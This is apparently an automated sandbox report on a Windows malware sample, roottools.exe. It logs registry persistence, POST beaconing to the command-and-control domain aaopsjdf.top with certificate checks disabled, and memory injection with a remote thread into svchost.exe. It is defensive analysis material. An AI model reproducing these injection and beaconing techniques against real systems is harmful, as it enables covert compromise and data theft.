| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close H, url = aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close H, url = aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:44 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = www.google.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close , url = www.google.com/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
12 | |
| Inet | Read Response | size = 4096, size_out = 635 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Get Time | type = Ticks, time = 31652 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| COM | Create | interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD, CLSCTX_NO_FAILURE_LOG |
|
6 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close Ä, url = aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close Ä, url = aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 236 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 600000 milliseconds (600.000 seconds) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 20000 milliseconds (20.000 seconds) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = A354992B05F4DA0EB1B4AB788E3CE988 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:48 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ր, url = aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/ |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ր, url = aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 1688 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, size = 1776, type = REG_BINARY |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:49 (UTC) |
|
1 | |
| Mutex | Create | mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, type = file_attributes |
|
10 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, size = 171 |
|
1 |
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | C:\Windows\SysWOW64\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:05:12, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:05:01 |
| Information | Value |
|---|---|
| PID | 0x7f8 |
| Parent PID | 0x6a4 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7E4
0x
350
0x
114
0x
614
0x
718
0x
59C
0x
60C
0x
4F8
0x
460
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x0008bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0009bfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x003c0000 | 0x00426fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x004b0000 | 0x004ebfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000550000 | 0x00550000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000560000 | 0x00560000 | 0x006e7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00870fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000910000 | 0x00910000 | 0x0094ffff | Private Memory | Readable, Writable |
|
|
|
|
| svchost.exe | 0x00960000 | 0x00967fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000970000 | 0x00970000 | 0x01d6ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x02162fff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02170000 | 0x0243efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002450000 | 0x02450000 | 0x0248ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024c0000 | 0x024c0000 | 0x024fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002510000 | 0x02510000 | 0x0254ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002550000 | 0x02550000 | 0x0258ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025d0000 | 0x025d0000 | 0x0260ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002650000 | 0x02650000 | 0x0268ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000026f0000 | 0x026f0000 | 0x0272ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002770000 | 0x02770000 | 0x027affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002810000 | 0x02810000 | 0x0284ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002850000 | 0x02850000 | 0x0288ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002890000 | 0x02890000 | 0x028cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | Readable, Writable |
|
|
|
|
| wow64cpu.dll | 0x743d0000 | 0x743d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x743e0000 | 0x7443bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74440000 | 0x7447efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x75630000 | 0x7566afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x75670000 | 0x75685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x75690000 | 0x75697fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x75800000 | 0x7580bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75810000 | 0x7586ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759c0000 | 0x75acffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x75ad0000 | 0x75ad4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75ae0000 | 0x75c3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x75c40000 | 0x75e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x75e70000 | 0x75f1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75f20000 | 0x76014fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x760b0000 | 0x7610ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76110000 | 0x761acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x761b0000 | 0x7623efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x76240000 | 0x7635cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x76360000 | 0x7636bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76370000 | 0x763c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76570000 | 0x7663bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76640000 | 0x76685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76690000 | 0x767c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x767d0000 | 0x767e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76800000 | 0x768effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x768f0000 | 0x768f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x76950000 | 0x769dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x76a70000 | 0x776b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000778b0000 | 0x778b0000 | 0x779a9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000779b0000 | 0x779b0000 | 0x77acefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77ad0000 | 0x77c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77cb0000 | 0x77e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x70000, size = 114688 |
|
1 | |
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x876c4, size = 4 |
|
1 | |
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x877d0, size = 4 |
|
1 | |
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x87d38, size = 4 |
|
1 | |
| Create Remote Thread | #15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x6a8 | address = 0x795bc |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
